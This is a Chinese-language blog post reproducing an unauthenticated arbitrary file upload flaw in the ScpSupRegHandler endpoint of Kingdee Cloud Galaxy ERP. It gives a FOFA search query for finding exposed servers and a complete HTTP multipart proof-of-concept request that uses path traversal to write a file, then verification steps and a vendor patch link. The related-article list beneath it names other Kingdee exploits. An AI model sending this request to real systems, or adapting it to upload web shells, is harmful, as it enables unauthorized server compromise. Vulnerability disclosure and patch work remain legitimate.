金蝶云星空 任意文件上传漏洞复现

已于 2023-11-21 09:17:34 修改
阅读量1.2k 收藏 3
点赞数
文章标签: 网络安全
于 2023-11-21 09:14:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43981050/article/details/134523305
版权

前言

此文章仅用于技术交流,严禁用于对外发起恶意攻击!!!

一、产品简介

金蝶云星空是由金蝶国际软件集团开发的一款企业级云平台。金蝶云星空管理中心是金蝶软件(中国)有限公司基于云计算、人工智能、物联网等前沿技术研发的新一代战略性企业管理软件。

二、漏洞描述

金蝶云星空管理中心ScpSupRegHandler接口存在任意文件上传漏洞。攻击者可在无需登录的情况下利用此漏洞上传任意文件

三、影响范围

金蝶云星空企业版私有云

企业版私有云(订阅)

标准版私有云(订阅)

版本<=V8.1

四、复现环境

FOFA:icon_hash=“-1629133697” && title==“金蝶云星空”

五、漏洞复现

1.访问存在漏洞的网站,抓包
在这里插入图片描述

2.POC

POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1
Host: ip-port
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=zsqxokga
Accept-Encoding: gzip
Content-Length: 276

--zsqxokga
Content-Disposition: form-data; name="dbId_v"

.
--zsqxokga
Content-Disposition: form-data; name="FID"

2022
--zsqxokga
Content-Disposition: form-data; name="FAtt"; filename="../../../../uploadfiles/ccc.txt"
Content-Type: text/plain

ccc

--zsqxokga--

3.上传成功
在这里插入图片描述
4.访问http://ip:port/k3cloud/uploadfiles/ccc.txt
在这里插入图片描述

六、修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://vip.kingdee.com/school/detail/505412093244235264?productLineId=1

参考链接

https://mp.weixin.qq.com/s/BrbJ1-svW5QzWt5SGTrrOg

明丨通
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
漏洞复现金蝶云星空管理中心 ScpSupRegHandler接口存在任意文件上传漏洞 附POC
失心少年
11-24 946
金蝶云·星空聚焦多组织,多利润中心的大中型企业,以 “开放、标准、社交”三大特性为数字经济时代的企业提供开放的 ERP 云平台。服务涵盖:财务、供应链、智能制造、阿米巴管理、全渠道营销、电商、HR、企业互联网服务,帮助企业实现数字化营销新生态及管理重构等,提升企业数字化能力。技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!
金蝶云星空企业版8.1发版说明
03-08
金蝶云星空财务系统企业版8.1的发版说明。
【SSV-99782】金蝶云星空私有云存在文件上传漏洞(2023年11月发布)
m0_73896875的博客
11-23 1071
金蝶云星空管理中心ScpSupRegHandler接口存在任意文件上传漏洞。攻击者可在无需登录的情况下利用此漏洞上传任意文件。
金蝶云星空 任意文件上传漏洞复现_金蝶云任意文件上传漏洞复现
最新发布
m0_60452070的博客
04-12 871
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
金蝶云星空ScpSupRegHandler任意文件上传漏洞复现 [附POC]
薛定谔嘚喵博客
11-20 653
漏洞存在于ScpSupRegHandler接口下,服务器对用户输入的数据没有进行严格的过滤,攻击者可以利用该漏洞获取服务器管理权限。
金蝶云星空RCE漏洞复现
0xSec
06-21 9322
由于金蝶云星空数据通信默认采用的是二进制数据格式,需要进行序列化与反序列化,在此过程中未对数据进行签名或校验,导致客户端发出的数据可被攻击者恶意篡改,写入包含恶意代码的序列化数据,达到在服务端远程命令执行的效果。该漏洞不仅存在于金蝶云星空管理中心(默认8000端口),普通应用(默认80端口)也存在类似问题。
金蝶云星空 CommonFileServer 任意文件读取漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
11-14 670
金蝶云星空V7.X、V8.X所有私有云和混合云版本存在一个通用漏洞,攻击者可利用此漏洞获取服务器上的任意文件,包括数据库凭据、API密钥、配置文件等,从而获取系统权限和敏感信息。
漏洞复现】​金蝶云星空管理中心
hackzkaq的博客
11-05 572
金蝶云星空是一款基于领先的可组装低代码PaaS平台,全面服务客户研发、生产、营销、供应链、财务等领域转型的企业管理服务平台。它已支持IPD、精益、阿米巴等先进管理理念在3.1万余家客户实践,一起助力企业“产品力、获客力、交付力、口碑力”。该漏洞存在于ScpSupRegHandler接口下,服务器对用户输入的数据没有进行严格的过滤,攻击者可以利用该漏洞获取服务器管理权限。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。免费领取安全学习资料包!
漏洞复现金蝶云星空-ScpSupRegHandler-任意文件上传
知黑而守白
01-25 189
金蝶云星空是一款云端企业资源管理(ERP)软件,为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。金蝶云星空允许攻击者通过ScpSupRegHandler接口构造特定的请求包进行任意文件上传。该漏洞使得攻击者可以在受影响的系统上上传恶意文件,潜在风险包括远程执行恶意代码、访问敏感数据,以及其他危险操作。攻击者可以通过上传恶意文件来滥用系统,可能导致灾难性后果。
金蝶云星空 任意文件上传漏洞复现_金蝶云任意文件上传漏洞复现(1)
2301_76268112的博客
04-09 277
zsqxokganame=“FID”2022–zsqxokgaccc–zsqxokga–3.上传成功4.访问http://ip:port/k3cloud/uploadfiles/ccc.txt。
某蝶EAS(Enterprise Application Suite)平台myUploadFile接口任意文件上传漏洞复现 CNVD-2023-57598
afei001
10-17 494
某蝶EAS(Enterprise Application Suite)是金某集团开发的一套企业级应用软件解决方案。它是一款集成化的企业管理软件,旨在帮助企业实现业务流程的数字化、自动化和优化。金蝶EAS提供了多个功能模块,涵盖了企业的各个方面,包括财务管理、人力资源管理、供应链管理、生产制造管理、销售与客户关系管理、项目管理等。这些模块可以根据企业的需求进行灵活的配置和定制,以满足不同行业和规模企业的管理需求。 某蝶EAS平台myUploadFile接口存在任意文件上传漏洞,攻击者可利用该
金蝶云星空字典表 SQL 数据库表 开发工具
08-12
方便做SQL视图或开发使用,运行K3CloudDataDictionaryexe.
金蝶云星空初级实施认证部分单选题
07-07
金蝶云星空初级实施认证部分单选题
金蝶云星空真实项目实施文档.zip
09-02
真实项目实施手册中的部分文档; 所有文档均出自本人独立实施的真实项目; 文档项目中所涉及到的甲乙方公司均已经替换为虚拟公司; 所有文档均由本人独立编撰完成; 包含模块(总账、智能会计平台、报表、应收款管理、应付款管理、发票管理、出纳管理、固定资产、采购管理、销售管理、库存管理、存货核算、质量管理、工程数据管理、计划管理、生产管理、车间管理、委外管理、产品成本核算); 含业务流程蓝图Visio源文件;
金蝶云cloud7.2数据字典 金蝶云星空 整合成chm
07-04
金蝶云cloud7.1数据字典 在2018年实施金蝶项目过程中对其进行了保存,仅供参考。包含BD基础,FIN财务,MFG制造,SCM供应链,SCO供应链协同,成本管理和集团财务。 整合成chm,方便用户搜索关键字查询!
【成功复现金蝶云星空反序列化远程代码执行漏洞
wuli1024的博客
01-25 1423
金蝶云星空是一款云端企业资源管理(ERP)软件,为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。
金蝶 EAS及EAS Cloud任意文件上传漏洞复现
0xSec
11-20 1030
金蝶 EAS 及 EAS Cloud 在 uploadLogo.action 接口处存在文件上传漏洞,攻击者可以利用文件上传漏洞执行恶意代码、写入后门、从而可能导致服务器受到攻击并被控制。
金蝶K/3 Cloud 实施笔记
shuaifg__66的博客
12-22 7969
金蝶K3Cloud的实施笔记
金蝶 apusic 应用服务器存在一个任意文件上传漏洞
12-21
金蝶apusic应用服务器存在一个任意文件上传漏洞,这意味着攻击者可以利用该漏洞向服务器上传恶意文件,从而可能导致服务器遭受各种安全攻击。攻击者可以利用这样的漏洞来上传包含恶意代码的文件,然后通过执行这些恶意代码来获取服务器的控制权,或者窃取服务器上的敏感信息。 为了解决这一漏洞,金蝶公司应当立即发布安全补丁程序,修复apusic应用服务器中的漏洞,并提醒用户及时更新。另外,用户也应当及时关注漏洞的公告信息,保持应用服务器和相关软件的更新,以减少被攻击的风险。 此外,金蝶公司还应当提升其应用服务器的安全性标准,加强对文件上传的验证和过滤机制,限制上传文件的类型和大小,确保用户只能上传安全的文件。同时,还应当加强应用服务器的访问控制和权限管控,以防止不明身份的用户对服务器进行上传操作。 最后,金蝶公司还应当加强安全意识教育,提高用户对安全漏洞的认识和预防意识,引导用户在使用应用服务器时注意安全问题,避免因为一时的疏忽而导致安全风险的产生。只有公司和用户双方共同努力,才能最大程度地保障应用服务器的安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值